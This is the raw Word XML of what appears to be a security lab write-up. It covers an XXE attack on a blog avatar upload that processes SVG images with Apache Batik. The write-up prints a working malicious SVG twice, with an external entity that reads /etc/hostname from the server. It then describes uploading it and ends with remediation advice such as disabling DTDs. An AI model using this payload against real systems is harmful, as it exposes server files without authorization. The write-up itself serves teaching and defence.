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1CAA799F" w:rsidR="00B36D89" w:rsidRPr="00EC3CC6" w:rsidRDefault="00DA1F52" w:rsidP="00A45757">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA1F52">
        <w:t>This lab provides users the ability to attach avatars to comments. Significantly, it uses the Apache Batik library for avatar image processing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68B4A221" w14:textId="77777777" w:rsidR="00714A84" w:rsidRPr="00714A84" w:rsidRDefault="00714A84" w:rsidP="00714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4A84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We design a local SVG image, filling it with the content: &lt;?xml version="1.0" standalone="yes"?&gt;&lt;!DOCTYPE test [ &lt;!ENTITY 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 xml:space="preserve"> SYSTEM "file:///etc/hostname" </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00714A84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt; ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00714A84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&lt;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 xml:space="preserve"> width="128px" height="128px" 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xmlns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 xml:space="preserve">="http://www.w3.org/2000/svg" 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xmlns:xlink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>="http://www.w3.org/1999/xlink" version="1.1"&gt;&lt;text font-size="16" x="0" y="16"&gt;&amp;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>;&lt;/text&gt;&lt;/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4BCCA17" w14:textId="77777777" w:rsidR="00714A84" w:rsidRPr="00714A84" w:rsidRDefault="00714A84" w:rsidP="00714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4A84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Subsequently, on posting a comment on a blog entry, this image is uploaded as an avatar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594D30C3" w14:textId="7C3EE539" w:rsidR="0058146F" w:rsidRPr="00714A84" w:rsidRDefault="00714A84" w:rsidP="00762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4A84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Upon viewing our comment, the image should illustrate the content from the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00714A84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Pr="00714A84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/hostname file. We then press the "Submit solution" button, sharing the server hostname.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438F5EAB" w14:textId="66172EE6" w:rsidR="00CA16B0" w:rsidRPr="00630668" w:rsidRDefault="003B40E6" w:rsidP="00001A9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B40E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?xml version="1.0" standalone="yes"?&gt;&lt;!DOCTYPE test [ &lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B40E6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3B40E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "file:///etc/hostname" </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003B40E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt; ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003B40E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B40E6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Pr="003B40E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> width="128px" height="128px" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B40E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xmlns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B40E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">="http://www.w3.org/2000/svg" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B40E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xmlns:xlink</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B40E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>="http://www.w3.org/1999/xlink" version="1.1"&gt;&lt;text font-size="16" x="0" y="16"&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B40E6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3B40E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;&lt;/text&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B40E6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="00630668" w:rsidRPr="00630668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27CBDBD5" w14:textId="77777777" w:rsidR="00DA1F52" w:rsidRDefault="00DA1F52" w:rsidP="00760ECD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37E739F1" w14:textId="1D08C8C5" w:rsidR="00760ECD" w:rsidRDefault="000A0B49" w:rsidP="00760ECD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="000A0B49">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34A521CD" wp14:editId="25A90ABC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5448300" cy="4454525"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="4252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547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741">
        <w:t>PROOF OF CONCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588025D0" w14:textId="6ADD0946" w:rsidR="00EA2741" w:rsidRDefault="000A0B49" w:rsidP="00760E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60A7B" wp14:editId="706E28DE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4775835</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2066925" cy="1988185"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="134186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619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40C78" w14:textId="7BE5D4D3" w:rsidR="00EA2741" w:rsidRDefault="00EA2741" w:rsidP="00760ECD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63CCF8D0" w14:textId="47378131" w:rsidR="00595F51" w:rsidRDefault="00595F51" w:rsidP="00760ECD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BE3922" w14:textId="77777777" w:rsidR="00BE1614" w:rsidRPr="00BE1614" w:rsidRDefault="00BE1614" w:rsidP="00BE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16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Image Validation: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1614">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ensure that incoming images match expected formats and are vetted before processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A2ACE2" w14:textId="77777777" w:rsidR="00BE1614" w:rsidRPr="00BE1614" w:rsidRDefault="00BE1614" w:rsidP="00BE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16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Disable DTDs in Libraries: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1614">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Within the Apache Batik library, the configuration of the XML parser should have DTDs disabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C8CBB" w14:textId="3E3A1ECA" w:rsidR="00595F51" w:rsidRPr="00BE1614" w:rsidRDefault="00BE1614" w:rsidP="00795E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161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Library Monitoring: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1614">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Maintain a routine of monitoring and updating third-party libraries to patch potential vulnerabilities timely.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00595F51" w:rsidRPr="00BE1614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8D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40CA1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2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1210191738">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="5547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01A9C"/>
    <w:rsid w:val="00005A2B"/>
    <w:rsid w:val="00050702"/>
    <w:rsid w:val="00050FA0"/>
    <w:rsid w:val="000A0B49"/>
    <w:rsid w:val="001464DE"/>
    <w:rsid w:val="00146D95"/>
    <w:rsid w:val="00152623"/>
    <w:rsid w:val="00172267"/>
    <w:rsid w:val="001D4955"/>
    <w:rsid w:val="0023054A"/>
    <w:rsid w:val="002D4948"/>
    <w:rsid w:val="0030568B"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="003B315E"/>
    <w:rsid w:val="003B40E6"/>
    <w:rsid w:val="003D0738"/>
    <w:rsid w:val="003D6F3C"/>
    <w:rsid w:val="004214CD"/>
    <w:rsid w:val="00455916"/>
    <w:rsid w:val="00470E74"/>
    <w:rsid w:val="004F232A"/>
    <w:rsid w:val="0053631B"/>
    <w:rsid w:val="0058146F"/>
    <w:rsid w:val="00586A86"/>
    <w:rsid w:val="00595F51"/>
    <w:rsid w:val="005D3446"/>
    <w:rsid w:val="005E3653"/>
    <w:rsid w:val="005E4E23"/>
    <w:rsid w:val="005F5B9D"/>
    <w:rsid w:val="00630668"/>
    <w:rsid w:val="006706BD"/>
    <w:rsid w:val="00676748"/>
    <w:rsid w:val="006E1C83"/>
    <w:rsid w:val="006F6440"/>
    <w:rsid w:val="00714A84"/>
    <w:rsid w:val="00760ECD"/>
    <w:rsid w:val="007649DD"/>
    <w:rsid w:val="007F52EB"/>
    <w:rsid w:val="008061DC"/>
    <w:rsid w:val="009F1CCE"/>
    <w:rsid w:val="009F6B4D"/>
    <w:rsid w:val="00A0135C"/>
    <w:rsid w:val="00A45143"/>
    <w:rsid w:val="00A45757"/>
    <w:rsid w:val="00A672AA"/>
    <w:rsid w:val="00B36D89"/>
    <w:rsid w:val="00B45E18"/>
    <w:rsid w:val="00BE1614"/>
    <w:rsid w:val="00C36F78"/>
    <w:rsid w:val="00C6154A"/>
    <w:rsid w:val="00C77580"/>
    <w:rsid w:val="00CA16B0"/>
    <w:rsid w:val="00CB17DB"/>
    <w:rsid w:val="00CC224F"/>
    <w:rsid w:val="00CE0A2A"/>
    <w:rsid w:val="00CF7A44"/>
    <w:rsid w:val="00DA1F52"/>
    <w:rsid w:val="00DC6F94"/>
    <w:rsid w:val="00DE3034"/>
    <w:rsid w:val="00E1363A"/>
    <w:rsid w:val="00EA2741"/>
    <w:rsid w:val="00EC3CC6"/>
    <w:rsid w:val="00F14089"/>
    <w:rsid w:val="00F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2023-10-03T06:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-09T05:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>